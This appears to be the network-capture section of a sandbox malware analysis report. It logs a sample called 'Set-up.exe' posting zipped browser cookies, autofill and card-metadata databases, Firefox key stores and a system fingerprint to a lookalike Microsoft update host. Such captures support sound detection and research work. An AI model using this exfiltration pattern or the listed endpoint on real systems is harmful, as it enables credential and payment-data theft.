                                                    May 10, 2025 08:05:39.881614923 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.881697893 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.881748915 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.881831884 CEST8148OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.881865025 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:39.881963968 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:40.023583889 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:40.023638964 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:40.023669958 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:41.758254051 CEST716INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:41 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nMZhLJcJLkWc8Kew7g0szsw2tpgjlqj%2BMn3p9%2FFfIgvLW8%2BLHprNc7fJXlw0m7wf%2FqZ6TryW1m%2F6PGQInLJyK73aTt0JrzNdKIQo7ClHU2PAGmVWwXdHxFU%2B%2FSqWpqVSozG"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f03dcbf0111-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=142109&min_rtt=142109&rtt_var=71054&sent=275&recv=389&lost=0&retrans=0&sent_bytes=0&recv_bytes=525070&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449727188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:43.706265926 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 41643
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 af 7d e8 83 00 a0 00 00 00 a0 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 13 00 00 00 0a 00 00 00 0a 00 00 00 03 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!R}b/c8/0/CookiesSQLite format 3@ .zpg [TRUNCATED]
                                                    May 10, 2025 08:05:43.847440004 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847476006 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847537994 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847573042 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847614050 CEST2716OUTData Raw: 53 4d 4f 66 6d 2d 4c 30 52 6e 53 38 2f 73 69 67 6e 69 6e 2d 6f 69 64 63 02 01 bb 07 3b 09 37 0d 09 3d 0f 01 02 01 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2e 41 73 70 4e 65 74 43 6f 72 65 2e 41 75 74 68 50 72 6f 76 69 64 65
                                                    Data Ascii: SMOfm-L0RnS8/signin-oidc;7=support.microsoft.com.AspNetCore.AuthProvider/I7Ysupport.microsoft.comMicrosoftApplicationsTelemetryDeviceId/#).microsoft.comak_bmsc/(7support.microsoft.comEXPID/%1
                                                    May 10, 2025 08:05:43.847637892 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847671032 CEST2716OUTData Raw: 47 99 4b 3a 24 11 92 69 64 8a e7 32 cc 2b 1d 2e 60 32 91 7c 92 1a bc 58 4c 53 9d 64 68 58 f9 c0 74 43 23 d8 13 68 9a f8 e3 f6 1a 9a b8 cd 70 7e 1a 5c 4b d8 a9 16 c5 94 51 b5 83 e5 29 7c c0 1d 56 fe 9d c9 4b 77 a1 81 24 2b 94 c4 1b 03 da c4 21 ee
                                                    Data Ascii: GK:$id2+.`2|XLSdhXtC#hp~\KQ)|VKw$+!{s)T52$EJ^a[P@4 N}TFn_8///Tm/Tm)#K/ewGj.c.bing.co
                                                    May 10, 2025 08:05:43.847697973 CEST2716OUTData Raw: 2f 16 16 06 2f 0d 17 0d 81 4b 0f 06 09 08 06 09 09 09 08 01 02 06 08 09 00 2f 65 77 47 97 5c 6b 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 53 52 4d 5f 49 76 32 30 ca 6b c1 b0 08 30 b6 c5 26 b9 03 d2 01 3a c5 b6 fd 2f 34 62 79 f2 37 f8 1d
                                                    Data Ascii: //K/ewG\k.c1.microsoft.comSRM_Iv20k0&:/4by7*RUC>Rv%8Sj9#)4YLs(P`(//k/ewG\k/ewG\o)#K/ewGs.c.bing.comSRM_Iv20h)Dh_g
                                                    May 10, 2025 08:05:43.847738981 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:43.847773075 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:44.319427967 CEST703INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:44 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=beH5WKSZJN0C4JbS466IFslIWf1aKcEW0rF2yZ%2F0stvCSYPYaLf8Q0EyeVMRxzBedYqXENtkP%2B4h4KDJGzvGJwOR90lBb7dAf0FHYfljuAvJVUP16LD2eiZDMBmqAmarudP4"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f1c9c095711-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141123&min_rtt=141123&rtt_var=70561&sent=23&recv=33&lost=0&retrans=0&sent_bytes=0&recv_bytes=41772&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449728188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:44.586924076 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 623250
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!Rb/g1/0/key3.dbPK\d!Rb/g1/0/key4.dbSQLite format 3@ .jz<{{{a{zz<z [TRUNCATED]
                                                    May 10, 2025 08:05:44.727869987 CEST9506OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:44.728013992 CEST17654OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:44.869349003 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:44.869518042 CEST51604OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011351109 CEST1358OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011447906 CEST25802OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011557102 CEST21728OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011624098 CEST16296OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011684895 CEST13580OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:45.011737108 CEST6790OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:46.166557074 CEST716INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:46 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2F0flg6yYBmnB29Ez%2BuMos42czo76A7ipXz%2FhauZZcl4vEpIgRJlk6vha%2FT8DIMVOT1VZn%2BJG8eTRVOxxROO8cthQKM%2FU7EBkc4XFe157nixMBYubgf%2BZ0jJPbjpyq0K6QKU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f2228cfb66b-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=140951&min_rtt=140951&rtt_var=70475&sent=270&recv=463&lost=0&retrans=0&sent_bytes=0&recv_bytes=623380&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449729188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:46.381714106 CEST612OUTPOST /Up/p HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 485
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 42 19 07 7a 33 01 00 00 33 01 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6f 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 22 2c 22 75 6e 22 3a 22 6a 6f 6e 65 73 22 2c 22 70 22 3a 22 4a 4f 4e 45 53 2d 50 43 22 2c 22 61 22 3a 22 78 36 34 22 2c 22 63 22 3a 34 2c 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 64 6e 22 3a 22 6e 75 6c 6c 22 2c 22 64 70 22 3a 22 32 32 32 22 2c 22 73 22 3a 22 31 32 38 30 78 31 30 32 34 22 2c 22 72 22 3a 34 30 39 35 2c 22 65 6c 22 3a 66 61 6c 73 65 2c 22 6c 74 22 3a 22 6e 75 6c 6c 22 2c 22 69 73 22 3a 5b 5d 2c 22 6c 69 22 3a 5b 5d 2c 22 70 6c 22 3a 5b 5d 2c 22 [TRUNCATED]
                                                    Data Ascii: PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"o":"Windows 10","un":"user","p":"user-PC","a":"x64","c":4,"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06","dn":"null","dp":"222","s":"1280x1024","r":4095,"el":false,"lt":"null","is":[],"li":[],"pl":[],"g":["Microsoft Basic Display Adapter"]}PK\d!RBz33(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKVy
                                                    May 10, 2025 08:05:46.677840948 CEST707INHTTP/1.1 200 OK
                                                    Date: Sat, 10 May 2025 06:05:46 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnuVyqGOQHpNg%2FPXX%2FLuu0ajUdEWO993sp4IIvF5ACsZY8Zk16qhh%2F71K1VK40hmQDZsZJRuki%2B3JVleZ0gHSgkudgp4hSy6AiuaXlhp3QTfwwPU1jRvNtSX82trkl%2F%2FxqNi"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 93d73f2d583797fd-PHX
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141845&min_rtt=141845&rtt_var=70922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=612&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449730188.114.96.3807572C:\Users\user\Desktop\Set-up.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 10, 2025 08:05:48.233824968 CEST13580OUTPOST /Up/b HTTP/1.1
                                                    Host: mcrsftuptade.pro
                                                    Connection: close
                                                    Content-Length: 139949
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 74 aa 79 19 00 20 02 00 00 20 02 00 0f 00 00 00 62 2f 63 38 2f 30 2f 57 65 62 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 06 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 2e 7a 70 05 00 00 00 05 07 e7 00 00 00 00 3c 07 fb 07 f6 07 f1 07 ec 07 e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: PK\d!Rty b/c8/0/Web DataSQLite format 3@ DJ.zp< [TRUNCATED]
                                                    May 10, 2025 08:05:48.375174999 CEST8148OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.375255108 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.375293970 CEST2716OUTData Raw: 72 76 65 72 5f 63 61 72 64 5f 6d 65 74 61 64 61 74 61 13 43 52 45 41 54 45 20 54 41 42 4c 45 20 73 65 72 76 65 72 5f 63 61 72 64 5f 6d 65 74 61 64 61 74 61 20 28 69 64 20 56 41 52 43 48 41 52 20 4e 4f 54 20 4e 55 4c 4c 2c 20 75 73 65 5f 63 6f 75
                                                    Data Ascii: rver_card_metadataCREATE TABLE server_card_metadata (id VARCHAR NOT NULL, use_count INTEGER NOT NULL DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0, billing_address_id VARCHAR)-??Etableautofi
                                                    May 10, 2025 08:05:48.375313044 CEST5432OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.375349998 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.375559092 CEST2716OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.517231941 CEST10864OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.517334938 CEST43456OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 10, 2025 08:05:48.659492970 CEST16296OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
